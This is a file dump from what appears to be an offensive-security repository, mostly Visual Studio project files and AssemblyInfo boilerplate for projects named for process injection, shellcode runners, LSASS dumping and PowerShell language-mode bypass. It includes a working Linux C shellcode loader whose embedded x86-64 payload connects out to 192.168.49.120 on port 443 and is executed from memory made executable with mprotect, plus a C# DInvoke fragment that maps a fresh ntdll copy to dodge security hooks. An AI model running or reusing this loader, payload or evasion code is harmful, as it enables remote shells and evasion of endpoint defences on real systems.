--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 |
31 |
32 | Source Files
33 |
34 |
35 |
--------------------------------------------------------------------------------
/C++/API_Hooking/UnHook-Ntdll-Exec/UnHook-Ntdll-Exec.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/CSharp/Linux-Post-Exploitation/shellcode_loader_mprotect.c:
--------------------------------------------------------------------------------
1 | #define _GNU_SOURCE
2 | #include //for mprotect #include
3 | #include
4 | #include
5 | #include
6 |
7 | //Shellcode: embedded x86-64 machine code, stored unencoded. NOTE(review): the eight bytes 02 00 01 bb c0 a8 31 78 in the middle of the array have the layout of a sockaddr_in (AF_INET, port 443, 192.168.49.120), i.e. an outbound TCP connection to a private-range address; confirm by disassembly before treating it as an indicator.
8 | unsigned char buf[] = "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
9 | "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a"
10 | "\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
11 | "\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x01\xbb\xc0\xa8"
12 | "\x31\x78\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59"
13 | "\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a"
14 | "\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48"
15 | "\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e"
16 | "\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6";
17 |
18 | int main() { // Entry point: forks; the child re-protects the page holding buf as read+execute and calls buf, the parent prints and returns.
19 | printf("I love programming."); // banner text only; it has no effect on the logic below
20 | if(fork() == 0) { // child process only
21 | intptr_t pagesize = sysconf(_SC_PAGESIZE); // the mprotect call below is given exactly this many bytes, starting at the page that contains buf
22 | if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)),
23 | pagesize, PROT_READ|PROT_EXEC)) {
24 | perror("mprotect");
25 | return -1;
26 | }
27 | // Data-to-code transfer: the global array is called through a function pointer. NOTE(review): an mprotect() that adds PROT_EXEC to a data page, followed by execution from it, is the behaviour that audit/seccomp rules on mprotect and execmem-style policies are meant to catch - verify against local policy.
28 | int (*ret)() = (int(*)())buf;
29 | ret();
30 | } else {
31 | printf("[HAX0R] returning from function... \n");
32 | }
33 | return 3; // exit status 3 for the parent, and for the child if the call above returns
34 | }
35 |
--------------------------------------------------------------------------------
/C++/Reflective_DLLs/ReflectiveLoader_DLL/ReflectiveLoader_DLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 | Source Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/C++/Timestomp/Timestomp.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/C++/Thread_Context/Thread_Context.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 | Resource Files
35 |
36 |
37 |
--------------------------------------------------------------------------------
/C++/Shellcode_Launcher/Shellcode_Launcher.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 | Resource Files
35 |
36 |
37 |
--------------------------------------------------------------------------------
/C++/AES_Process_Injection/AES_Process_Injection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 | Resource Files
35 |
36 |
37 |
--------------------------------------------------------------------------------
/C++/HellsGate/HellsGate.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30114.105
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
17 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
18 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
19 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
20 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
21 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
22 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
23 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/CSharp/Hollow/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Hollow")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Hollow")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("93a21197-d776-4323-a095-65849134c842")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_MapViewOfSection/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | using Invoke = DInvoke.DynamicInvoke;
8 | using Data = DInvoke.Data;
9 | using Injection = DInvoke.Injection;
10 |
11 | namespace DInvoke_MapViewOfSection
12 | {
13 | internal class Program
14 | {
15 | static void Main(string[] args) // Unfinished sample: the final call references NtMapViewParams and dNtMapViewOfSection, neither of which is defined in this file. args is unused.
16 | {
17 | string ntdll = "C:\\Windows";
18 | ntdll += "\\Sy";
19 | ntdll += "tem32\\n";
20 | ntdll += "tdll.dll";
21 | // The fragment-built string is only printed; as written the fragments spell "Sytem32". The mapping call on the line after the print passes its own literal path.
22 | Console.WriteLine(ntdll);
23 | DInvoke.Data.PE.PE_MANUAL_MAP ntdllmap = DInvoke.ManualMap.Map.MapModuleToMemory("C:\\Windows\\System32\\ntdll.dll");
24 | if (ntdllmap.ModuleBase == IntPtr.Zero)
25 | {
26 | Console.WriteLine("No NTDLL for you my friend...");
27 | return;
28 | }
29 | Console.WriteLine("I've got you an NTDLL brother..");
30 | // NOTE(review): MapModuleToMemory is asked for a second copy of ntdll.dll read from disk. Loaders do this so that later Nt* calls run from a copy without the user-mode hooks placed in the normally loaded module; a private executable region whose contents match ntdll, next to the real image, is the memory-scan artefact to look for - confirm against the DInvoke version in use.
31 | Console.ReadLine();
32 | // Execution pauses at the ReadLine above until Enter is pressed.
33 |
34 | Invoke.Generic.CallMappedDLLModuleExport(
35 | ntdllmap.PEINFO,
36 | ntdllmap.ModuleBase,
37 | "NtMapViewOfSection",
38 | typeof dNtMapViewOfSection,
39 | NtMapViewParams,
40 | false);
41 | //Invoke.Generic.CallMappedDLLModule(ntdllmap.PEINFO, ntdllmap.ModuleBase);
42 |
43 |
44 |
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/CSharp/Shell_Service/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("MSService")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("664bc9dd-0603-4af6-87b8-ed1025e97a11")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DLL_Inject/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DLL_Inject")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DLL_Inject")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("7799e50c-81da-4b72-87f6-fe56e3998abe")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/PS_Inject/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PS_Inject")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PS_Inject")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("bc6188b5-a382-4ddb-b0c9-4854905d7c7f")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/Process_Injection/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Inject")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Inject")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("7a832eaa-5969-4749-bf96-2aa4c40d1183")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ProcDump/ProcDump/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("LsassDump")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("LsassDump")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("538504f6-5f8e-4de7-b5c8-debd8e285fb1")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/AES_SCRunner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("AES_SCRunner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("AES_SCRunner")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("6620cfc8-3037-427a-96db-fc220d2dc1e9")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/NT_ProcessInjection/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes, emitted into the compiled assembly's
6 | // metadata. NOTE(review): the title and product read "NT_scRunner" while the
7 | // project directory is NT_ProcessInjection — confirm which name is intended.
8 | [assembly: AssemblyTitle("NT_scRunner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("NT_scRunner")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("f24791aa-7e1b-4bf8-a924-21889fd3a61b")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes, emitted into the compiled assembly's
6 | // metadata. NOTE(review): the title and product are "ConsoleApp1", which looks
7 | // like a template default, not the directory name ShellcodeRunner — confirm.
8 | [assembly: AssemblyTitle("ConsoleApp1")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ConsoleApp1")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("f0fe5b10-458a-4fb5-8440-f8f9efbd95bd")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/SC_UUID_Runner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("SC_UUID_Runner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SC_UUID_Runner")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("110c5cb7-d375-4c12-9852-c2786de1dbca")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("PSLangBypass")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. NOTE(review): the AssemblyInfo.cs under /Powershell_CLM_Bypass/PSLangBypass/PSLangBypass carries the same GUID and title; the two directories look like copies of one project.
23 | [assembly: Guid("c10f38a5-fe8e-4d99-aa8b-240f935778e5")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/AES_SC_Encrypter/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("AES_SC_Encrypter")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
